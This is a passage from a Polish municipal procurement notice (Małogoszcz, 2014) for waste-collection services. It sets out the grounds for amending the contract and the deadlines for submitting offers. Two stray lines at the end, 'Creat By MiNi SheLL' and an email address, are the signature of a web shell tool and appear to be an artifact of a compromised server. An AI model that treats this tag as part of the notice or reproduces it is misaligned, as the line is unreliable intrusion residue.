- zmianami przepisów prawa, w tym prawa miejscowego, wpływających na zasady lub sposób lub zakres odbierania lub zagospodarowania odpadów komunalnych
- przestojów lub opóźnień spowodowanych przez Zamawiającego, o ile okoliczności te powodują konieczność zmiany terminu i zmiany w tym zakresie będą dokonane, z uwzględnieniem okresów niezbędnych do przesunięcia terminu wykonania umowy, przy czym zmiana terminu dokonana z uwzględnieniem pełnego miesiąca świadczenia usługi.
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w zakresie sposobu realizacji przedmiotu umowy na skutek:
- zaistnienia siły wyższej tj. zdarzenia bądź połączenia zdarzeń obiektywnie niezależnych od stron umowy, które istotnie utrudniają wykonywanie zobowiązań wynikających z umowy, których strony umowy nie mogły przewidzieć przed zawarciem umowy i którym nie mogły zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o fakcie zaistnienia siły wyższej oraz wskazać zakres i wpływ, jakie zdarzenie miało na przebieg realizacji przedmiotu umowy;
- zmiany przepisów prawa, w tym prawa miejscowego, wpływającej na zasady lub sposób lub zakres odbierania lub zagospodarowania odpadów komunalnych
- dokonania zmiany szczegółowego opisu przedmiotu zamówienia stanowiącego załącznik Nr 1 do SIWZ, nie skutkującej zmianą zakresu przedmiotu zamówienia ani wysokości wynagrodzenia;
- wzrost liczby obsługiwanych przez Wykonawcę nieruchomości powyżej 10% w stosunku do liczby wykazanej  w załączniku nr 2 do umowy w dniu  zawarcia  umowy,
- zmiany technologiczne, w szczególności pojawienie się nowszej technologii wykonania przedmiotu zamówienia pozwalającej na zaoszczędzenie czasu realizacji zamówienia lub jego kosztów,
- zmianę harmonogramu świadczenia usług,
- wprowadzenie przez Zamawiającego zmian w systemie odbioru odpadów (np. zmiany częstotliwości odbioru odpadów, wprowadzenie dodatkowego rodzaju odbieranych odpadów w aktach prawa miejscowego),
przy czym zmiany powyższe nie będą stanowić podstawy zmiany wynagrodzenia Wykonawcy.
Dopuszcza się możliwość zmian postanowień zawartej umowy w zakresie ceny jeżeli w trakcie jej obowiązywania:
- ulegnie zmianie ustawowa stawka podatku od towarów i usług i gdy zmiana ta spowoduje zwiększenie lub zmniejszenie kosztów wykonania umowy po stronie Wykonawcy. Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia wynagrodzenia należnego Wykonawcy o kwotę stanowiącą różnicę między nowo obowiązującą a dotychczasową wysokością podatku od towarów i usług, jednakże wyłącznie za okres po wejściu w życie zmiany jego wysokości;
- zostaną wprowadzone nowe podatki lub opłaty o charakterze publicznoprawnym.
Dopuszcza się możliwość zmian postanowień zawartej umowy w zakresie formy prawnej Wykonawcy jeżeli w trakcie jej obowiązywania zmianie ulegnie siedziba, adres, forma prawna Wykonawcy.
Dopuszcza się możliwość zmian postanowień zawartej umowy w zakresie osób przewidzianych do realizacji zamówienia przez strony w przypadku nieprzewidzianych zdarzeń losowych takich jak: śmierć,  choroba, ustanie stosunku pracy pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.malogoszcz.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Małogoszczu, ul. Jaszowskiego 3A, 28-366 Małogoszcz, pokój nr 15 w godz. 7:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2014 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego: Urząd Miasta i Gminy w Małogoszczu, ul. Jaszowskiego 3A, 28-366 Małogoszcz, w sekretariacie do dnia 28.11.2014 r do godz. 10:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com